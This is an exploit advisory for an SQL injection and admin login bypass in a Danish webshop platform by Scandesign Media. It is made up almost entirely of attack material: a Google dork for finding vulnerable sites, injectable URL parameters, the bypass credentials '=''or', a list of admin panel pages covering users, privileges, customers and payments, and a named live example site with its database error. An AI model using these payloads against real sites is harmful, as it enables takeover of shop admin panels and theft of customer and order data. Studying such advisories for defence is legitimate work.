#################################################################################################
# Exploit Title : Scandesign Media AS Denmark SQL Inj Auth Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 12/09/2018
# Vendor Homepage : scandesignmedia.dk
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
+ CWE-592 - [ Authentication Bypass Issues ]
#################################################################################################
# Google Dork : intext:''Scandesign Media A/S'' site:dk
# SQL Injection Exploit :
/categori.php?show=long&sort=newest&count=[ID-NUMBER]&categori=[SQL Injection]
/categori.php?show=long&sort=newest&count=[ID-NUMBER]&categori=[ID-NUMBER]&type=normal&tc=[ID-NUMBER]&page=[ID-NUMBER]&tc=[SQL Injection]
# Admin Login : /admin/login.php
Username : '=''or'
Password : '=''or'
# Useable Admin Control Panel URL Links =>
/admin/user/edit_user.php
/admin/categori_items/cat.php
/admin/categori_items/reference.php
/admin/categori_items/index_userdefined.php
/admin/categori_items/add_userdefined.php
/admin/campaign/campaign.php
/admin/order/confirmorder.php
/admin/order/faktura.php
/admin/databases/customer.php
/admin/user/edit_priviligies.php
/admin/configuration/config.php
/admin/custompage/custompage.php
/admin/freight_paymethod/freight.php
/admin/freight_paymethod/paymethod.php
#################################################################################################
# Example Site =>
cobioshop.dk/categori.php?show=long&sort=newest&count=20&categori=15%27 => [ Proof of Concept ] => archive.is/GOpwQ
cobioshop.dk/categori.php?show=long&sort=newest&count=20&categori=15&type=normal&tc=1&page=3&tc=1%27
# SQL Database Error =>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0'' at line 1
on line: 10
SELECT item_id FROM webshop_tbl_item WHERE _catid = '15'' AND item_deleted = '0'
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################